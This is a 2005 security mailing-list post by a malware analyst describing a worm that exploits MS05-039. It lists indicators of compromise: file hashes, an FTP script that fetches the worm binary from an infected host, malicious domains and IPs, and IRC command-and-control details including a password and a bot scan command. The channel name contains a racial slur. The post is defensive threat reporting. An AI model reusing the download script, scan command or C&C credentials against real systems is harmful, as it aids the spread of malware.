[Dshield] MS05-039 Attack -- Info

[Eric Kedrosky]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

A major outbreak started, for me, in the Asia Pacific region around
12:00am EST August 15th, 2005.

This is associated with an exploit for the MS05-039 vulnerability.  Once
the virus file is executed on the system it connects home to the Command
and Control (C&C) IRC server and then starts scanning for other
vulnerable systems on its B Class network on port 445/tcp.

Below is the technical info that I have gathered thus far:

Virus File Information
- ----------------------
So far this is the only sample that I have been able to capture

File: winpnp.exe
MD5 Hash: 105f1217a81be3d5dc893623c376b2c5
Size:   276480
This file is commonly found at C:\Winnt\System32\ with attributes SHR

File: o
MD5 hash: 8727c0addbf0d89f022366fc151309b5
Type: ASCII text, with CRLF line terminators
Size: 66 KB
This file is commonly found at C:\Winnt\System32\  with attributes A

Contents:
open <IP of Infected System> 33551
user 1 1
get winpnp.exe
quit


DNS Stuff
- -----------
real.atillackici.net
- --> 62.193.233.52 (rDNS --> wpc1336.amenworld.com)
- --> 84.244.7.62 (rDNS --> serv-2-7-62.lycos-vds.com)

IRC C&C Information
- ---------------
irc2.samurai.net

Port: 		8080
Channel: 	#niggah
Password: 	staner
Topic: 		.advscan pnp445 200 7 0 -r -s

If also saw this while monitoring the channel:
"kevin sets mode: +o kevin"

More info will follow as I collect it.

If you need to please feel free to contact me offline.

- --
Eric Kedrosky
Security Analyst - Malware
Nortel
ekk at nortel.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFDAIcizarw7+pQTZ0RAi+tAJ9V/Cottsrkf3DtUzxv8dlHgSQBkgCdHyJj
e0KFotqYS/EJDUalDcisHUo=
=7E0n
-----END PGP SIGNATURE-----